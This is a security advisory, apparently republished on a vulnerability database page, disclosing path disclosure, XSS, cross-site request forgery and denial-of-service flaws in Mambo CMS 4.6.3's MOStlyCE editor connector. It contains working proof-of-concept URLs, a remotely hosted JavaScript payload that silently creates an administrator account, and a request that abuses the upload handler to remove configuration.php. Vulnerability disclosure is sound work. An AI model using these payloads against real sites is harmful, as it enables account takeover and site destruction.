Mambo 4.6.3 Path Disclosure, XSS , XSRF, DOS

2009-09-15 / 2009-09-16
Risk: Medium
Local: No
Remote: Yes

##### WwW.BugReport.ir #### # # AmnPardaz Security Research Team # # Title: Mambo Vulnerabilities # Vendor: http://mamboserver.com # Bugs: Path Disclosure, XSS , XSRF, DOS # Vulnerable Version:4.6.3 (prior versions also may be affected) # Exploitation: Remote with browser # Fix Available: No! ### #################### - Description: #################### Mambo is an, open source, modular, web content management system (CMS), written in Php with a MySql database in backend. #################### - Vulnerability: #################### +--> Path Disclosure POC: http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/ filemanager/connectors/php/connector.php?Command=RenameFile +--> XSS POC: http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/ filemanager/connectors/php/connector.php?Command=<script>alert(document. cookie)</script> +--> XSRF (the exploit creates an admin account) POC:http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_ mce/filemanager/connectors/php/connector.php?Command=<script type=text/javascript src=http://somewhere/test.js></script> content of http://somewhere/test.js /* Set desiered user, pass, email and victims url then upload the script somewhere on the web */ window.onload = function() { var url = 'http://localhost/MamboV4.6.2/administrator/index2.php'; var gid = 25; var user = 'amnpardaz'; var pass = 'amnpardaz'; var email = 'amnpardaz (at) none (dot) com [email concealed]'; var param = { name: user, username: user, email: email, password: pass, password2: pass, gid: gid, block: 0, option: 'com_users', task: 'save', sendEmail: 0 }; var form = document.createElement('form'); form.action = url; form.method = 'post'; form.target = 'hidden'; form.style.display = 'none'; for (var i in param) { try { // ie var input = document.createElement('<input name="'+i+'">'); } catch(e) { // other browsers var input = document.createElement('input'); input.name = i; } input.setAttribute('value', param[i]); form.appendChild(input); } document.body.appendChild(form); form.submit(); location.replace(url); } +--> DOS "mostlyce component" Image Manager note from mambo 4.6.3: Important: In order to utilize the Image Manager functionality you must create the folder structure shown below in your document root folder. Not your Mambo root, your document root! For this installation your document root is [something]. You can create this structure manually or extract the UserFiles.zip file included with MOStlyCE at that location. You can find the UserFiles.zip file at /mambots/editors/mostlyce. If an administrator follows up the above instruction,its possible for a remote attacker to remove any file from the remote server for example the main configuration file, which could result in remote denial of service! The impact of the vulnerability increases when the administrator doesnt remove "installation" folder (its common to rename it to something predictable such as "_installation"), in such a condition its possible for a remote attacker to delete configuration.php and install a new version of mambo on the victim server using remote database! Code Snippet: /mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/Commands/FileUpload.php #45-60 function run() { //If using CGI Upload script, get file info and insert into $_FILE array if ( (sizeof($_FILES)==0) && isset($_GET['file']) && isset($_GET['file']['NewFile']) && is_array($_GET['file']['NewFile']) ) { if (isset($_GET['file']['NewFile']['name'])&&$_GET['file']['NewFile']['size ']&&$_GET['file']['NewFile']['tmp_name']) { $_FILES['NewFile']['name']=basename(str_replace("\\","/",$_GET['file'][' NewFile']['name'])); $_FILES['NewFile']['size']=$_GET['file']['NewFile']['size']; $_FILES['NewFile']['tmp_name']=$_GET['file']['NewFile']['tmp_name']; } else { $disp="202,'Incomplete file information from upload CGI'"; } } . . . #163-178 //Upload file if (is_uploaded_file($_FILES['NewFile']['tmp_name'])) { if (move_uploaded_file($_FILES['NewFile']['tmp_name'],($this->real_cwd."/$f ilename.$ext"))) { chmod(($this->real_cwd."/$filename.$ext"),0777); $disp="0"; } else { $disp="202,'Failed to upload file, internal error...'"; } } else { if (rename($_FILES['NewFile']['tmp_name'],($this->real_cwd."/$filename.$ext "))) { chmod(($this->real_cwd."/$filename.$ext"),0777); $disp="0"; } else { $disp="202,'Failed to upload file, internal error...'"; } } . . . POC: http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/ filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[ NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/co nfiguration.php&file[NewFile][size]=1&CurrentFolder= #################### - Credit : #################### AmnPardaz Security Research Team Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com

References:

http://xforce.iss.net/xforce/xfdb/39986
http://www.vupen.com/english/advisories/2008/0325
http://www.securityfocus.com/archive/1/archive/1/487128/100/200/threaded
http://www.bugreport.ir/index_33.htm
http://secunia.com/advisories/28670
http://osvdb.org/42532
http://forum.mambo-foundation.org/showthread.php?t=10158
http://archives.neohapsis.com/archives/bugtraq/2008-02/0444.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top